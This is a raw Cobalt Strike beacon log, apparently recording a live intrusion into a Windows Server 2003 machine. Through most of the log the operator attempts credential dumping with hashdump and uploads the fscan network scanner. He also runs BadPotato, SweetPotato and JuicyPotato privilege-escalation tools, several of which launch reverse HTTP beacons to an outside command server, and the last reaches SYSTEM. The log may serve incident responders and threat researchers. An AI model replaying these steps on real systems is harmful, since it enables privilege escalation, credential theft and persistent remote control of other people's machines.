02/04 07:31:41 UTC [metadata] 112.199.110.98 <- 192.168.5.15; computer: INSSRV01; user: NETWORK SERVICE; process: system.exe; pid: 6080; os: Windows; version: 5.2; build: 3790; beacon arch: x86
02/04 07:31:54 UTC [task] <> Tasked beacon to list processes (from Process Browser)
02/04 07:32:33 UTC [checkin] host called home, sent: 12 bytes
02/04 07:36:19 UTC [input] <karson> hashdump
02/04 07:36:19 UTC [error] 此命令需要管理员权限
02/04 07:36:43 UTC [input] <karson> elevate svc-exe 2008
02/04 07:36:44 UTC [task] <T1035, T1050> Tasked beacon to run windows/beacon_http/reverse_http (107.151.246.11:8849) via Service Control Manager (\\127.0.0.1\ADMIN$\fa3b3b1.exe)
02/04 07:36:44 UTC [indicator] service: \\. fa3b3b1
02/04 07:36:44 UTC [indicator] file: 150fe7bbbc29f055c0befe05b847078d 291840 bytes \\127.0.0.1\ADMIN$\fa3b3b1.exe
02/04 07:37:35 UTC [checkin] host called home, sent: 293849 bytes
02/04 07:37:37 UTC [error] could not upload file: 5 - ERROR_ACCESS_DENIED
02/04 07:37:37 UTC [error] Could not open service control manager on .: 5
02/04 08:08:11 UTC [output]
9=========== BadPotato (BeichenDream) ==========

02/04 08:08:14 UTC [task] <T1093> Tasked beacon to run .NET program: BadPotato.exe whoami
02/04 08:08:44 UTC [checkin] host called home, sent: 155191 bytes
02/04 08:08:48 UTC [output]
received output:
[*]

    ____            ______        __        __      
   / __ )____ _____/ / __ \____  / /_____ _/ /_____ 
  / __  / __ `/ __  / /_/ / __ \/ __/ __ `/ __/ __ \
 / /_/ / /_/ / /_/ / ____/ /_/ / /_/ /_/ / /_/ /_/ /
/_____/\__,_/\__,_/_/    \____/\__/\__,_/\__/\____/ 

Github:https://github.com/BeichenDream/BadPotato/       By:BeichenDream
            
[*] PipeName : \\.\pipe\76f86bfd3d9340669c8f83128514f083\pipe\spoolss
[*] ConnectPipeName : \\INSSRV01/pipe/76f86bfd3d9340669c8f83128514f083
[*] CreateNamedPipeW Success! IntPtr:1664


02/04 08:09:19 UTC [output]
9=========== Watson (获取可提权漏洞) ==========

02/04 08:09:29 UTC [task] <T1093> Tasked beacon to run .NET program: Watson.exe
02/04 08:09:48 UTC [checkin] host called home, sent: 118827 bytes
02/04 08:09:48 UTC [output]
received output:
[!] RpcOpenPrinter fail!


02/04 08:09:48 UTC [output]
received output:
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v2.0    
                                   
                   @_RastaMouse



02/04 08:10:44 UTC [output]
Ladon BadPotato whoami

02/04 08:10:48 UTC [checkin] host called home, sent: 275019 bytes
02/04 08:10:52 UTC [output]
received output:
 [*] OS Build Number: 3790
 [!] Windows version not supported



02/04 08:10:52 UTC [output]
received output:
Ladon 9.1.1 For CobaltStrike
Start: 2024-02-04 16:11:56
Runtime: .net 4.0  me: x86 OS: x86
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition


02/04 08:11:52 UTC [output]
received output:
Machine Make: Acer
RunUser: NETWORK SERVICE PR: -IsService
Priv: SeImpersonatePrivilege Enabled 
PID: 4340  CurrentProcess: rundll32
FreeSpace: Disk C:\ 23180 MB

Load BadPotato
[*] PipeName : \\.\pipe\0015425731b5404d984d3c0b8d111129\pipe\spoolss
[*] ConnectPipeName : \\INSSRV01/pipe/0015425731b5404d984d3c0b8d111129
[*] CreateNamedPipeW Success! IntPtr:1416
[!] RpcOpenPrinter fail!


02/04 08:13:27 UTC [output]
9=========== 上传 Fscan ==========

02/04 08:14:51 UTC [task] <> cd C:\Users\Anonymous\Desktop\fsdownload\fscan32.exe
02/04 08:14:52 UTC [checkin] host called home, sent: 57 bytes
02/04 08:15:13 UTC [task] <> Tasked beacon to upload C:\Users\Anonymous\Desktop\fsdownload\LSTAR\scripts\IntrScan\x86\fscan.exe as fscan.exe
02/04 08:15:21 UTC [indicator] file: d5054ed83e63f911be46b3ff8af82267 4546560 bytes fscan.exe
02/04 08:15:53 UTC [warning] Unable to add task of 260117 bytes as it is over the available size of 2006 bytes. 14 task(s) on hold until next checkin.
02/04 08:15:53 UTC [checkin] host called home, sent: 1046570 bytes
02/04 08:16:11 UTC [input] <karson> hashdump
02/04 08:16:11 UTC [error] 此命令需要管理员权限
02/04 08:17:22 UTC [output]
Ladon SweetPotato whoami

02/04 08:17:44 UTC [warning] Unable to add task of 260117 bytes as it is over the available size of 8108 bytes. 11 task(s) on hold until next checkin.
02/04 08:17:44 UTC [checkin] host called home, sent: 1040468 bytes
02/04 08:18:59 UTC [warning] Unable to add task of 260117 bytes as it is over the available size of 8108 bytes. 7 task(s) on hold until next checkin.
02/04 08:18:59 UTC [checkin] host called home, sent: 1040468 bytes
02/04 08:20:29 UTC [warning] Unable to add task of 260117 bytes as it is over the available size of 8108 bytes. 3 task(s) on hold until next checkin.
02/04 08:20:29 UTC [checkin] host called home, sent: 1040468 bytes
02/04 08:21:34 UTC [checkin] host called home, sent: 837241 bytes
02/04 08:22:06 UTC [output]
received output:
Ladon 9.1.1 For CobaltStrike
Start: 2024-02-04 16:23:10
Runtime: .net 4.0  me: x86 OS: x86


02/04 08:23:07 UTC [output]
received output:
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
Machine Make: Acer
RunUser: NETWORK SERVICE PR: -IsService
Priv: SeImpersonatePrivilege Enabled 
PID: 5488  CurrentProcess: rundll32
FreeSpace: Disk C:\ 23180 MB

Load SweetPotato
SweetPotato by @_EthicalChaos_

[+] Attempting DCOM NTLM interception with CLID 4991D34B-80A1-4291-83B6-3328366B9097 on port 6666 using method Token to launch c:\Windows\System32\cmd.exe
[+] Intercepted and authenticated successfully, launching program
[+] CreatePipe success
[+] Created launch thread using impersonated user NT AUTHORITY\SYSTEM
[+] process with pid: 0 created.

=====================================

[!] Failed to created impersonated process with token: 1349


02/04 08:24:17 UTC [output]
9=========== Watson (获取可提权漏洞) ==========

02/04 08:24:20 UTC [task] <T1093> Tasked beacon to run .NET program: Watson.exe
02/04 08:25:07 UTC [checkin] host called home, sent: 118827 bytes
02/04 08:25:08 UTC [output]
received output:
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v2.0    
                                   
                   @_RastaMouse

 [*] OS Build Number: 3790
 [!] Windows version not supported



02/04 08:26:39 UTC [output]
9=========== SweetPotato（MS16-075） ==========

02/04 08:26:44 UTC [task] <> Task Beacon to run windows/beacon_http/reverse_http (107.151.246.11:8849) SweetPotato (ms16-075)
02/04 08:27:08 UTC [checkin] host called home, sent: 770017 bytes
02/04 08:27:09 UTC [output]
received output:
[+] SweetPotato by @_EthicalChaos_,fixed by 2020/4/16

[+] Attempting DCOM NTLM interception with CLID 4991D34B-80A1-4291-83B6-3328366B9097 on port 6363 using method Token to launch c:\windows\system32\werfault.exe


02/04 08:28:09 UTC [output]
received output:
[+] Intercepted and authenticated successfully, launching program
[+] Created launch thread using impersonated user NT AUTHORITY\SYSTEM
[!] Failed to created impersonated process with token: 2


02/04 08:28:32 UTC [output]
9=========== Juicypotato（MS16-075） ==========

02/04 08:28:37 UTC [task] <> Task Beacon to run windows/beacon_http/reverse_http (107.151.246.11:8849) JuicyPotato (ms16-075)
02/04 08:29:10 UTC [checkin] host called home, sent: 261473 bytes
02/04 08:29:12 UTC [output]
received output:
.

02/04 08:30:12 UTC [output]
received output:
.....

02/04 08:31:12 UTC [output]
received output:

[+] authresult 0
[*] {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK


02/04 10:27:26 UTC [output]
9========== 查看连接(本机连接其他机器) ==========

02/04 10:27:26 UTC [task] <T1059> Tasked beacon to run: net use
02/04 10:28:22 UTC [checkin] host called home, sent: 38 bytes
02/04 10:28:22 UTC [output]
received output:
New connections will be remembered.

There are no entries in the list.



